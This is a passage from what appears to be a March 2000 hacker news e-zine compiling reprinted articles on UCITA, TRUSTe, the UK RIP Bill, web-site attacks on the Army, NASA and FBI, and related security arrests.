money to contribute to election campaigns. 2.The legislators probably have not actually read UCITA, and that enabled supporters of UCITA to mislead them about both what UCITA would do and why people oppose it. 3.The supporters of UCITA probably told the legislators ... that if Virginia passes UCITA and other states do not, some software companies will move to Virginia. State legislators and governors often give an unreasonable amount of emphasis to winning business to their states from other states. They often do this without regard to whether the country as a whole will benefit or suffer as a result. Business often uses this to manipulate states, to play one state against another, to get what it wants. The joke, though, is on them, because only retail Internet sites would move to Virginia, and the total employment of these sites would be insignificant. The software development will remain where it is, in California, Washington, Bangalore or wherever. (Sorry about formatting, couldn't be bothered to pretty it up ... - Ed) @HWA 23.0 HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The industry trade group TRUSTe was formed in an effort at self regulation and to help fend off unwanted legislation. Are they really doing the public a service? An interview with TRUSTe CEO Bob Lewin details how even sites selling personal data can acquire the privacy seal of approval. Salon http://www.salon.com/tech/view/2000/03/13/truste/index.html The privacy police? TRUSTe CEO Bob Lewin explains how even sites selling personal data can get the nonprofit's privacy seal of approval. - - - - - - - - - - - - By Lydia Lee March 13, 2000 | When TRUSTe launched in 1996, the nonprofit promised to help the Internet industry regulate itself with regard to protecting surfers' privacy. Over the past three years, it has vetted the privacy policies of over 1,300 sites, and its black-and-green logo, which signals to visitors that a site actually abides by its policies, can be found on most major e-commerce sites. But what kind of teeth does the organization really have? TRUSTe didn't look so trusty last year when a security expert found that its licensee RealNetworks had been collecting user information on the sly. Instead of reprimanding the company, the nonprofit argued that because RealNetworks' privacy violations took place via its RealJukebox software, not its Web site, the incident was outside the purview of TRUSTe. More recently, it's been other privacy advocacy groups like JunkBusters that have alerted the public to privacy violations such as Intel's decision to include an identifier in its Pentium III chip; JunkBusters also started a campaign against DoubleClick's acquistion of Abacus when it was announced last June. But Bob Lewin, executive director and CEO of TRUSTe, says the group's privacy seal program plays an important role in enforcing privacy policies. Previously, Lewin was vice president of marketing at networking software company ISOCOR and before that at the open systems consortium X/Open Company. Now he heads up this nonprofit that charges between $300 and $4,999 to certify an e-commcerce site's privacy practices. What's the basic message you're giving to consumers when they see the TRUSTe symbol? Is it that the site isn't going to sell my data? The bottom line is that this site adheres to the fair information practices -- that they are disclosing what information they're collecting, why and if they're sharing that information with somebody. No 2: that they're giving the visitor the choice -- whether to allow that to happen; 3) that once the information is collected, they will use reasonable security to protect that information; 4) that they allow the consumer reasonable access to that information to modify it. So if I were collecting consumers' e-mail addresses and then selling them to a direct-marketing company, would I still be able to get the TRUSTe symbol? Only if you stated that to the consumer in your privacy statement. If somebody came to us and said, "Here's our privacy statement. We will collect the e-mail addresses, and it's our intent to sell or share this information with these third parties, and we are giving you the option to say yes or no to this." Then that site could become a TRUSTe licensee. What percentage of sites get rejected? It's not a large percentage -- I'd guess 1 to 2 percent. What's the major reason sites get rejected? Once they start through the process, they can't or will not meet the requirements of the program. Say they'd like to be able to share info with a subsidiary, and we say, "That's to a third party, you have to disclose that." Well, they may voluntarily decide they're not going to proceed. Also, we don't apply our mark to gambling sites, since it's illegal in some states. The other reason that it happens, frankly, is that 85 percent of our sites are very small -- $10 million and below --- and as the process starts, the company goes out of business. If DoubleClick had been a TRUSTe member, would its decision to combine its database of anonymous surfing habits with an acquired database of personal information have set off red flags for you? There would be some issues. That's why we formed a third-party ad server committee, to get all the technical and legal issues out on the table. They would have had to inform us before they changed their policy, and we would have had some discussions. Once it has the TRUSTe seal, have you ever kicked out a site for doing something? No, we've come very close, but we haven't had to do it. The escalation process is as follows: We get a complaint from a consumer about a licensee, and once we are assured that the consumer had previously contacted the Web site to try and get it resolved -- because a lot of these are just misunderstandings -- we then contact the Web site and investigate and find out indeed if there's a real issue here. Now, the resolution to this may result in a change in the privacy policy, the business model, or what have you. Shouldn't you have caught that kind of stuff when you reviewed the policy in the first place? Well yes, but the nature of the beast is that all of this is software. What is generally the case is that there's been some unplanned feature in the software. Something will happen -- not that somebody wanted to do it, but the software allowed them to do it. So, when it happens, you point it out, it gets fixed and it's over. But that shouldn't mean they need to change their privacy policy, should it? It could be just a software change, but it could be a policy change. Let's say you implement software that shares information, or decide to collect more info than you originally stated -- perhaps you're collecting IP addresses, or disseminating cookies. So you have to change your policy. This whole thing is not a static field. We do constant monitoring, but many of our licensees will communicate with us, and in fact one-third of our efforts is focused on working with them. As their Web sites evolve, we've got to ensure that the privacy statement evolves. It's an ongoing process. Would it be incumbent on the company to notify all the users who had seen the previous privacy policy? If they start collecting new information, then at that point in time, they have to communicate to users from this point forward, "We are also doing this." So that has to be stated clearly in the privacy statement. It would not impact people from beforehand because that information was not being collected. But what if the people from beforehand come back and then they don't read the privacy policy? Is there anything in the TRUSTe program that says if you are instituting a new privacy policy, you have to let all the consumers from before know that? Well, we can't force consumers to read privacy statements, but in all our consumer outreach programs, we tell people: Even if you've visited this site before -- because things change -- the first thing to do is go to the privacy statement and review it to make sure there have been no changes. And we encourage licensees to put any changes up at the front. This is easier said than done -- none of us like to read pages and pages of text. Have you ever blown the whistle on a company? Yes, there are instances -- most of the problems are not with malice aforethought. The major monitoring is by consumers themselves, but we have people who look at the sites every quarter, to see if there've been any changes on the site. We also enter in names that we make up, opt-in in some cases and opt-out in others, so if we get communication to a name then we know where it came from. What role should the government have in enforcing online privacy? They play a very important role now, because they conduct studies on whether improvement has occurred within the industry -- the number of privacy statements, the quality of privacy statements. I think the government has clearly stated that certainly in the health-care and financial area, they feel the need to have some kind of legislation. They also did that for children --the Children's Online Privacy Protection Act. They've said that because this is super-sensitive information, you should have some guidelines. Now, the question becomes, what vehicle do you use to enforce that legislation, which is equally important. We feel that seal programs -- and in particular, TRUSTe -- play a very important part there. COPPA is going into law April 21, and our contract will contain the elements for Web sites to adhere to COPPA requirements. But it seems like a lot for any one company to keep up with. With all these violations going on, it seems like there needs to be a more watchful eye. I would say that there is a watchful eye, if people look at the facts versus hype from some advocacy groups. It's all very well to run around screaming and yelling, "The sky is falling, the sky is falling," but the fact is, many of these issues that have come up are evolutions that occur in business models on the site. I would argue that the industry has demonstrated very quick response when those problems come up. Take RealNetworks. The issue there occurred outside the scope of the current TRUSTe program. Yes, Real Networks is a TRUSTe licensee, but this particular issue had nothing to do with the collection of personal information on the Web site; it had to do with the collection of user information using software servers. Now, within a week, even though it was outside the program, we announced the formation of a pilot to evolve our program to handle those situations. I defy any government agency to do that. But customers aren't thinking, when they see the TRUSTe symbol, that it only covers the Web site. Maybe from the technical view it's different, but the consumer isn't going to make the distinction. Does the TRUSTe program cover both now? Yes, we need to do a better job so the consumer intuitively knows what the TRUSTe logo stands for. Ultimately, it would be great -- as we lay out the software privacy program -- to blend the two programs together. Or there may be a TRUSTe symbol for sites and one for software. What privacy issues are you trying to anticipate? One thing we're looking at is the wireless world, where we start talking about palm-held things and hand-held things and phones. I think there are some issues there we haven't fully addressed yet. We need to add more meat to the term "reasonable security." Today, that's the best term people have, because it can vary so much depending on the application and the technology. As we put more and more of these things into people's hands, we have to worry about how we prove that the person holding it is indeed the proper owner. salon.com | March 13, 2000 - - - - - - - - - - - - About the writer Lydia Lee is an associate editor for Salon Technology. @HWA 24.0 HNN:Mar 15th:UCITA Sign By Governor in Virginia ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by techs Set to take effect in July 2001 the Uniform Computer Information Transaction Act has been signed into law in Virginia by Governor James S. Gilmore III. UCITA will allow software companies to remotely disable software and will giving licensing agreements the force of law. Washington Post http://www.washingtonpost.com/wp-dyn/articles/A6866-2000Mar14.html Computer World http://www.computerworld.com/home/print.nsf/all/000314F772 Post; Gilmore Signs 1st Internet Commercial Code Into Law By Craig Timberg Washington Post Staff Writer Tuesday, March 14, 2000; 1:00 PM Virginia Gov. James S. Gilmore III signed the nation's first set of contractual rules specifically governing electronic commerce into law today on the second day of an Internet summit at George Mason University. The Uniform Computer Information Transaction Act, which is typically called by its initials "UCITA," overwhelmingly passed the General Assembly during the just-finished legislative session despite the opposition of critics who contended it would erode basic consumer rights. Because of that continuing debate, the law will not take effect until July 2001 while lawmakers study the fine print. Supporters such as Gilmore (R) say UCITA mainly updates for the Information Age the commercial codes that states passed decades ago. UCITA essentially gives the force of law to software licensing agreements as soon as a consumer rips the shrink-wrap off the box or hits the "I Accept" button on a program downloaded from the Internet. "UCITA provides clarity to contract law where none existed before, whichwill make it easier for consumers and industries to conduct transactions viathe Internet," Gilmore said in a statement. "This increase in electronic transactions will perpetuate the Internet revolution, promote e-commerce and foster the growth of Virginia's technology and manufacturing economies." State officials hope that by becoming the first state to adopt UCITA, Virginia will further its reputation as a center of high-technology and attract more businesses to the state. But consumer advocates warn that in the rush to adopt UCITA, Virginia overlooked concerns that have caused two dozen attorneys general around the country, including Maryland's J. Joseph Curran Jr. (D) to write a letter voicing concerns. Consumer groups warn that UCITA will give software companies new power to disable or "reposses" their products if they believe they are being used in a way that violates the licensing agreement. Another worry, say consumer advocates, is that buyers won't always know the details of the licensing agreements until after the purchase is made. "The whole idea of informed shopping is based on disclosure before purchase," said Jean Ann Fox of the Virginia Citizens Consumer Council, which lobbied against the bill. The signing took place at The 2000 Global Internet Summit at George Mason's campus in Fairfax. (c) 2000 The Washington Post Company -=- Computer World; Va. governor signs UCITA legislation into law By Patrick Thibodeau 03/14/2000 Fairfax, Va. � Flanked by the chairman of one of the state's largest businesses � America Online Inc.'s Steve Case � Virginia Gov. James Gilmore today signed the Uniform Computer Information Transactions Act (UCITA) into law. But the bill won't take effect until July 2001, giving people and businesses with concerns about UCITA time to seek legislative amendments, the governor said. "We're not deaf to people's concerns," said Gilmore. Still, Gilmore said he doesn't believe those concerns were "legitimate impediments" to the state's adoption of the legislation. The year-delay for adoption came at the behest of a coalition of some of the state's largest nontechnology companies, who believe UCITA gives software vendors the upper hand in software licensing (see story). "If there's any sense that things may not be quite right, there is plenty of time for people to come in under Virginia's approach and have a chance to do some amendments," said Gilmore. The state plans to create a study committee to examine the issues raised by the business coalition that sought to delay the law's implementation. UCITA sets a series of default rules governing commercial software transactions. One of its most controversial provisions would allow a software vendor to automatically disable software in a contract dispute. Case praised Virginia's action and said he hoped "other states will look at this and learn from this and embrace it." Virginia is moving quickly on UCITA to help create an attractive climate for its technology businesses. For UCITA to become the law of the land, technically it must be adopted by 50 states. But companies may nonetheless cite UCITA in their license agreements. "If Virginia remains the only state that adopts this, then I believe that the certainty of our (actions) would attract additional businesses into the commonwealth," said Gilmore. Maryland is also actively considering the legislation. @HWA 25.0 HNN:Mar 15th:RIP Goes Before Commons Today ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lady Sharrow The UK Government's Regulatory Investigatory Powers (RIP) Bill goes before Select Committee in the House of Commons today and in a little more than six months it could be enshrined in law. The bill will force ISPs to have the facilities to log and monitor all online activities of their users. The Register UK http://www.theregister.co.uk/000314-000016.html Posted 14/03/2000 11:37am by Sean Fleming What the hell is... the UK's RIP Bill The UK Government's Regulatory Investigatory Powers (RIP) Bill goes before Select Committee in the House of Commons today and in a little more than six months it could be enshrined in law. But with 30 amendments tabled against it and an angry mob of opponents waiting to string it up, RIP has become better known for the widespread - and some might say kneejerk - reaction people have had to it, rather than for its aims and content. Civil liberties groups, individual Net users and politicians from all the major UK parties are banding together to decry what is being labelled a Snoopers Charter. But just what is all the fuss about? The Blair administration has been slammed by many for its cronyism and control freakery, so is this just another example of Big Brother Blair wanting to watch over you at all times? Growing pains To become an accepted part of everyday life, and not just the place to go for cyberporn, e-fraud and to pick up your email, the Internet will have to appeal to a broader cross-section of the general public. Ecommerce, for example, will never thrive in a world where the majority of potential users and customers are too scared to part with their credit card details in case they get ripped off. The not-so-wired public need to feel confident about the Internet. This is all part of the natural evolution that all things go through when they achieve popularity. The days of the WWW Wild West are numbered. So, what does the Bill propose and why are so many people objecting to it. The Bill describes itself as: "A Bill to make provision for and about the interception of communications, the acquisition and disclosure of data relating to communications, the carrying out of surveillance, the use of covert human intelligence sources and the acquisition of the means by which electronic data protected by encryption or passwords may be decrypted or accessed; to provide for the establishment of a tribunal with jurisdiction in relation to those matters, to entries on and interferences with property or with wireless telegraphy and to the carrying out of their functions by the Security Service, the Secret Intelligence Service and the Government Communications Headquarters; and for connected purposes." Lots of spooky terms in there - "covert human intelligence sources" translates as spies - but in essence this is all about setting down a legal framework within which electronic communications are treated no differently from telephone tapping and intercepting mail (as in the paper stuff). Some people will throw their hands in the air at the very thought of any this but cracking down on the illegal use of the Internet by terrorists, perverts and organised criminals may be considered by many to be A Good Thing. One size fits all However, the Bill falls down - and in a big way - in the details. Or lack of them. It is vague on practicalities, and how permission to access private communication will be granted. ISPs will be obliged by law to have the facilities to log and monitor all the online activities of their users. But the Bill doesn't specify how this will be done. And while there is talk of the Government reimbursing hardware costs with regard to monitoring, it doesn't make provision for the massive increase in overheads this will bring. The Bill is also very vague in parts and can be interpreted in such a way that much of it becomes nonsensical. For example, it defines who will be covered by the Bill when it becomes law: "a person who provides a postal service, or b) a person who provides a public telecommunications service, or c) a person not falling within paragraph b) who has control of the whole or any part of a telecommunications system located wholly or partly in the UK." ISPs, mobile phone companies, WAP service providers, news servers and so on all fall under the term "telecommunications service". Look at that definition again - it could mean anyone. One of the Bill's fiercest critics is the organisation Stand. This is what Stand has to say on this point: "You're no longer using an ISP to connect to the Net. You're using the ISP's public telecommunication system." The Bill also makes it an offence for you to be told that a surveillance warrant has ever been issued against you. That offence exists in perpetuity - there is no expiry date, you can never be told. And should anyone ever tell you they risk a prison sentence. Someone to watch over me Ah yes, you may be thinking, I live in a liberal democracy - the security forces can't just go round snooping on people willy nilly. Well, guess again. Here's what the Bill says about surveillance warrants. There are four main justifications given by the bill for issuing a warrant: a) national security interests, b) to prevent or detect serious crime, c) to safeguard the UK's economic well being d) for the purpose, in circumstances appearing to the Secretary of State to be equivalent to those in which he would issue a warrant by virtue of paragraph (b), of giving effect to the provisions of any international mutual assistance agreement. And there's a list as long as your arm of those people who can issue the warrant against you - from senior police officers to "any such other personas the Secretary of State may by order designate". Reading between the lines, the Bill says that the Home Secretary can - for any reason - issue a warrant against anyone, and that anyone with the Home Secretary's permission can do likewise. Don't forget, you'll never know if information has been gathered about you, what it was used for and so on. Taking Liberties As it stands, reader Simon Batistoni writes , The RIP Bill contains one truly frightening basic assumption: if you have stored on your computer any form of encrypted message, you will be forced on request by the police to hand over the necessary keys t decrypt this data. If you do not have the keys, YOU MUST PROVE THAT YOU HAVE NEVER BEEN IN POSSESSION OF THEM, or you could be subject to a two-year jail term. The principle of the police being able to view encrypted data, so that they can nail paedophiles, drug dealers, etc, has some genuine merits. The flaw in this measure, however, is that the recipient/possessor of encrypted data is guilty, until proven innocent, something which destroys the entire foundation of our legal system. What's more, it is impossible to prove that you never had something. As it stands, the measures in the Bill could be applied to a PGP-encrypted signature on an email, currently used by many as a reliable means of identity verification. Theoretically, the innocent father of a suspect under surveillance, who receives an email from his son containing the standard encrypted signature, could fall under the scope of this RIP Bill; he could be jailed for failing to reveal the contents of the encrypted data. Ostriches need not apply Small wonder that there is so much opposition to the Bill. There are many more examples of the above thinking running throughout the Bill, such as the loophole that could mean you have to keep tabs on yourself but can never let yourself know, otherwise you end up in prison. Stand has done a much more comprehensive job of examining RIP than The Register is able to do and its site is well worth a visit. Don't be fooled into thinking that your Government will always have your best interests at heart, because that's not the way of Governments. But at the same time, don't assume that any attempt to regulate the Internet is an invasion of rights and freedoms - freedom without responsibility is, after all, little more than latent tyranny. We will all be affected by the RIP Bill when it becomes law - as it almost certainly will, in some form or another - so now is the time to find out a little more about it and decide where you stand, because in another six months it could all be too late. � @HWA 26.0 HNN:Mar 15th:Security Patch Locks Out Users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse A a 128-bit security patch for Internet Explorer 5.0, 5.0a, and 5.0b released by Microsoft will replace security files with older versions that will lock users out of their systems after restart. Microsoft has asked administrators to stop distributing the patch and has said that a fix will be available soon. InfoWorld http://www.infoworld.com/articles/en/xml/00/03/14/000314enpatch.xml IE5/Windows 2000 security patch can lock out users By Cynthia Morgan, Computerworld MICROSOFT WARNED NETWORK administrators on Monday to stop distributing a security patch for Internet Explorer 5.0 that could prevent Windows 2000 users from logging in to their computers. Instructions included with the patch, a 128-bit security add-on for Internet Explorer 5.0, 5.0a, and 5.0b versions, are incorrect, said a Microsoft spokesman. The error, a command-line "switch," causes an automated installation to replace security files with older versions that will lock users out of their systems after restart. The 128-bit security installations under Windows 9x and Windows NT 4.x are not affected, the spokesman added. Administrators who have built automated installation packages for Internet Explorer 5.0 on Windows 2000 systems should check the Microsoft site for information on correcting the problem. Meanwhile, installation packages containing the faulty switch should be frozen immediately. A Microsoft KnowledgeBase bulletin (#Q255669) with complete instructions and updates should be available at search.support.microsoft.com/kb within 24 hours, the spokesman said. Microsoft Corp., in Redmond, Wash., is at www.microsoft.com For more enterprise computing news, go to www.computerworld.com. Copyright (C) 2000 Computerworld, Inc. All rights reserved. @HWA 27.0 HNN:Mar 15th:DNA Used for Steganography ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dan 17-year-old Romanian-born Viviana Risca topped the 59th Intel Science Talent Search competition by embedding a computer message in the gene sequence of a strand of DNA using steganography, a data encryption technology that allows a computer user to hide a file within another file. San Jose Mercury News http://www.sjmercury.com/svtech/news/breaking/merc/docs/013955.htm What you're doing right now? Don't worry, it's totally normal. Posted at 7:51 a.m. PST Tuesday, March 14, 2000 New York teen-ager win $100,000 with encryption research WASHINGTON (AP) -- A 17-year-old Romanian-born girl who embedded a computer message in the gene sequence of a strand of DNA has been named the best young scientist in the country. Viviana Risca, a senior at Paul D. Schreiber High School in Port Washington, N.Y., won a $100,000 college scholarship when she bested 10 other high school seniors on Monday in the 59th Intel Science Talent Search competition. Risca said her project in steganography, a data encryption technology that allows a computer user to hide a file within another file, was a simple one. Risca, who emigrated from Romania eight years ago, embedded the secret message ``June 6 Invasion: Normandy.'' Technologies like steganography can protect sensitive electronic information from interception or eavesdropping, but they can also wreak havoc if used by terrorists and criminals. Formerly known as the Westinghouse Science Talent Search, the contest has been nicknamed the ``Junior Nobel Prize.'' Past winners include five Nobel laureates, nine MacArthur Foundation fellows and two Fields medalists. Forty finalists came here to compete for the award. Jayce Getz, a senior at Big Sky High School in Missoula, Mont., won second prize and a $75,000 scholarship for a math project on partition function. And Feng Zhang, a senior at Theodore Roosevelt High School in Des Moines, Iowa, won third prize and a $50,000 scholarship for a biochemistry project in molecular virology. The other winners in the top 10, their schools, the amounts of their scholarships and their projects were: Alexander Schwartz, Radnor (Pa.) High School, $25,000, abstract algebra concerning Abelian groups; Eugene Simuni, 18, Midwood High School in Brooklyn, N.Y., $25,000, a biochemistry project that investigated G proteins; Matthew Reece, duPont Manual Magnet High School, Louisville, Ky., $25,000, a proposal on fluid dynamics problems; Kerry Ann Geiler, 17, Massapequa (N.Y.) High School,$20,000 for a project on communication by ants; Elizabeth Williams, Palos Verdes Peninsula High School, Rolling Hills Estates, Calif., $20,000, perception of light and shape by the brain; Zachary Cohn, 17, Half Hollow Hills East High School in Dix Hills, N.Y., $20,000 for a study of perfect squares; Bob Cherng, Troy High School, Fullerton, Calif., $20,000, the transition of ammonia and hydrogen halide into ammonium halide. The other 30 finalists received $5,000 scholarships. @HWA 28.0 HNN:Mar 15th:Bugging SAT Phones ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Odin A lot of people have turned to satellite phones as a last ditch effort to retain some privacy. Now Motorola has patented a means by which to listen in to a satellite phone to satellite phone call. New Scientist http://www.newscientist.com/news/news_222923.html (sorry: 404! - Ed) @HWA 29.0 HNN:Mar 15th:More and more EZines ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by L33t Dawg New issues of several e-zines have been released including, Hack In The Box Issue #3, HWA Haxor news #51 and Datacore has released DataZine 0.02. Hack In The Box Issue #3 http://www.hackinthebox.org HWA.hax0r.news You're here already :-) DataZine .02 http://www.tdcore.com/index2.html @HWA 30.0 HNN:Mar 16th:Army on Alert Over CyberAttack Fear ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Army has placed all of its worldwide cyber defense teams on full alert after learning of a threat from a group known as The Boys From Brazil. The group has threatened to deface the army.mil home page. The Army has said that it is aware of the group's or attack profile, and is prepared for any attack against the Army's Web site and that they have enacted additional 'countermeasures' to protect the site. (Is there really a threat? Who knows, but this sounds like one hell of a publicity stunt.) Federal Computer Week http://www.fcw.com/fcw/articles/2000/0313/web-armyhac-03-15-00.asp Army on hacker alert BY Dan Verton Updated 03/16/2000 at 17:05 EST HOUSTON � The Army has placed its cyberdefense teams on full alert after a known hacker group threatened to take down the Army's World Wide Web home page this Friday. On Tuesday evening the Army placed its cyberdefenders at the Land Information Warfare center at Fort Belvoir, Va., on full alert after a group known as the Boys from Brazil threatened to hack into the Army home page on Friday. But today the Army clarified that the hacker group it is watching is Hacking for Girliez, which took down the New York Times' site in September 1998. Most of the hackers' remarks appeared in comment tags, which can be seen in source material but not on a Web page. The tags include such remarks as "'Immature kids' were able to bypass...$25,000 firewalls [and] bypass the security put there." Philip Loranger, chief of the Command and Control Protect Division in the Army's Information Assurance Office, speaking here at the 2000 Army Directors of Information Management Conference, said the Army is prepared for any attack against the its Web site. "We've had to activate some countermeasures to protect the Army home page," Loranger said, declining to provide specifics for security reasons. However, he said the countermeasures being put in place do not include disconnecting the Army site from the Internet. Specific details emerged today on some of the steps the Army has taken in the past few months to prepare for these types of attacks. Lt. Col. James Withers, a systems engineering specialist with the Army signal command, said the Army's regional CERTs have written special software scripts that will help defend against known hacker tactics. The Army also developed Web cache proxy servers that divert Web surfers away from primary servers residing behind firewalls on Army installations. The Army is also in the process of deploying a protected domain name system architecture that will help the service regain control of all Army Internet sites and network entry points. "We know the hackers mapped [the old architecture]," Withers said, adding that 90 percent of the Army's global protected DNS architecture should be completed by April. Loranger demonstrated for conference attendees how simple it is for hackers to exploit known operating system vulnerabilities using widely available hacker tools and standard systems administrator procedures. In fact, Loranger, with the approval of the Army's staff counsel, demonstrated a live hacking of another computer system to show how within minutes hackers can crack into known password vulnerabilities and take over entire systems and networks. Loranger also said that the lack of international laws governing conduct on the Internet poses real obstacles to the government's ability to respond to foreign-based hacker attacks. Loranger pointed out that some graduate-level computer education schools in India, for example, have established hacking into U.S. government systems as an academic requirement. Lt. Col. LeRoy Lundgren, program manager for the Army's National Security Improvement Program, said as many as 285,000 network queries were denied by Army security systems last year because of the questionable method used. Lundgren added that the Army has seen an increase in the number of queries originating in foreign countries, particularly China and Bulgaria. @HWA 31.0 HNN:Mar 16th:NASA Fears CyberAttack From Brazil ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles NASA's Jet Propulsion Laboratory has blocked all access to its web site from addresses originating in Brazil due to fears of a cyber attack. JPL spokes people said that access would be restored once additional security measures where in place. (How does blocking one country effect anything?) Newsbytes http://www.newsbytes.com/pubNews/00/145708.html NASA Division Battles The Hack From Ipanema By Robert MacMillan, Newsbytes WASHINGTON, DC, U.S.A., 15 Mar 2000, 1:15 PM CST From Antonio Carlos Jobim to the samba, the US generally has welcomed some of the cooler cultural exports from Brazil, but the latest one - a series of hack attacks on NASA's Jet Propulsion Laboratory at CalTech - has the agency bossa nova-ing its way toward beefing up its security measures. JPL Spokesman Frank O'Donnell confirmed for Newsbytes an MSNBC report that the agency has shut down access to queries emanating from Brazil until the agency's security team makes some necessary improvements to its network. O'Donnell said that the Brazil shutout was not a "blacklist" attempt, as earlier reports indicated. "There was a number of recent attacks on JPL hosts originating from various sites in Brazil, and as a temporary move while our computer security people work, we're blocking network access to JPL from Brazil," O'Donnell said. "But this is a temporary thing." He said normal service to South America's largest nation would return "in a matter of days at most." He added that he is "not aware of any (security) compromises per se in these attacks." Highly secure data at JPL generally is not stored on hosts that are connected to the Internet, O'Donnell also said, but added that he could "not go into a great deal of detail" on what kind of information was sought. MSNBC reported the Brazil problem after a network analyst at the Bank of Brazil in Brasilia reported that he could not access the JPL site. The service also reported that a CERT official at its headquarters in Pittsburgh, Pa., said that blocking access to an entire network or country is reasonably common, though the official said that spoofing attacks - when the address of the attacking e-mail in a denial of service attack is falsified - blocking against a particular domain or country code becomes largely ineffective. O'Donnell said that CERT and the JPL have been working jointly on security issues. Reported by Newsbytes.com, http://www.newsbytes.com . 13:15 CST @HWA 32.0 HNN:Mar 16th:FBI Site Hit by DOS Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles Just as the FBI was posting information about the 50th anniversary of its "Ten Most Wanted Fugitives" to its web site it was hit with a denial of service attack. The attacked forced the web site offline for several hours. UPI - via Virtual New York http://www.vny.com/cf/News/upidetail.cfm?QID=71527 FBI Web site attacked Wednesday, 15 March 2000 15:15 (ET) FBI Web site attacked By MICHAEL KIRKLAND WASHINGTON, March 15 (UPI) -- There has been another "denial of service" cyber-attack against a high-profile Web site, sources told UPI Wednesday -- this time the target was the FBI's own Web page, which was taken out of action for several hours Tuesday. The attack hit just as the FBI was posting information about the 50th anniversary of its "Ten Most Wanted Fugitives" list, which was celebrated Tuesday at the bureau with the opening of a permanent headquarters exhibit. A "denial of service" attack overwhelms a Web site with requests for information, but with "spoofed" -- fabricated -- return e-mail addresses. A site tries to endlessly answer the requests, and in effect ties itself in knots until it shuts down. There was no indication yet on whether Tuesday's cyber-attack was a "distributed" denial of service attack, similar to those launched against major commerical sites on the Internet early last month. Those attacks temporarily crippled Yahoo!, E-Trade, CNN.com and others. U.S. investigators were still pursuing leads on the latest attack Wednesday, defining its nature. A "distributed" attack is one which uses "innocent" third-party computer systems. Illegal hackers, called "crackers," usually find the attack software "tools" available "in the wild" on the Internet. The "distributed denial of service," or DDOS, tools enable a cracker to break into an unsuspecting computer system and implant "packets" or "daemons" that will cause the system to launch an attack against a target unless detected and disabled in time. Literally hundreds of "zombie" computer systems can be infected, without their operators' knowledge, and can launch a simultaneous attack. The FBI is still searching for at least two unnamed suspects in February's attacks. Much of the search has been concentrated in Canada with the help of the Royal Canadian Mounted Police. Agents are also concentrating on Germany, where the DDOS "tools" may have originated, though Germany is not believed to be the country of origin for the actual attacks. There was no immediate indication Wednesday that the attack on the FBI site came from the same suspects wanted for the attacks on the commerical sites. -- Copyright 2000 by United Press International. All rights reserved. @HWA 33.0 HNN:Mar 16th:Teenager Arrested in Online Bank Scam ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Someone has finally been arrested in a scam that has been circling around the Internet for months. Various online banks offer cash rewards just for opening an account. The scam works by opening several accounts under false names and then transferring the free money from each account into a real account. A 14 year old student at Thomas Jefferson Middle School in Jefferson City Missouri was able to amass over $2000. The scam was uncovered by a postal worker after he started delivering 'bushels' of mail to an address owned by the kids father. (Discovered by a postal worker?) APB News http://www.apbnews.com/newscenter/internetcrime/2000/03/15/netbanker0315_01.html Teen Busted in Internet Banking Scam 120 Fake Accounts Yielded $2,000 in Rewards March 15, 2000 By Carol Huang JEFFERSON CITY, Mo. (APBnews.com) -- An eighth-grader in rural Missouri signed up for more than 120 fake bank accounts through the Internet to rake in a total of $2,000 in new customer cash rewards, authorities said today. "He didn't realize the gravity of what he was doing, but he knew it was wrong and that it wasn't his money," said Cole County Sheriff John Hemeyer. Hemeyer said the boy, 14, a student at Thomas Jefferson Middle School, had been helping his father, a self-employed construction contractor, enter business records onto a computer when he found an Internet site offering an opportunity to open a bank account. Eventually, the teen had more than 120 accounts at banks around the country, each under a name generated by his computer, and had transferred more than $2,000 in cash freebies into a real account of his own. Puzzled postal worker A puzzled postal worker reported delivering "bushels of baskets of mail" to a vacant trailer on a plot of land, and investigating deputies went to the boy's father, who owns the land. Besides entering the teen into the juvenile court system, deputies confiscated his computer, which he had upgraded using the cash rewards, Hemeyer said. "It's the only referral we've ever had on this kid. So if he quits, and pays back some money, that will be about it," Hemeyer said. Carol Huang is an APBnews.com staff writer (carol.huang@apbnews.com). @HWA 34.0 HNN:Mar 16th:Former Employee Arrested For Attack On Company ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne 31 year old Abdelkader Smires, was charged in United States District Court in Brooklyn with computer-related fraud and remained in custody pending a bail hearing on Friday. Smires is being accused of causing his former company, Internet Trading Technologies, Inc. (ITTI) which provides software that allows market-makers to conduct online securities transactions, to shut down several times since last Thursday by directing coordinated attacks against the firms computer networks. NY Times http://www.nytimes.com/aponline/a/AP-Cyber-Spat.html C|Net http://news.cnet.com/news/0-1007-200-1573627.html?tag=st.ne.1002.thed.1007-200-1573627 Associated Press - via San Jose Mercury News http://www.sjmercury.com/breaking/docs/073358.htm NYTimes: pay -=- C|Net ITTI employee arrested in hacker attack By Bloomberg News March 15, 2000, 4:20 p.m. PT An employee of Internet Trading Technologies, a provider of trade-execution services for securities firms, was arrested yesterday and charged with attacking ITTI computers and causing interruptions in its services this week, the U.S. Attorney's Office in Brooklyn said. The employee, Abdelkader Smires, a database programmer, launched a series of data transmissions intended to cause the firm's computers to crash after 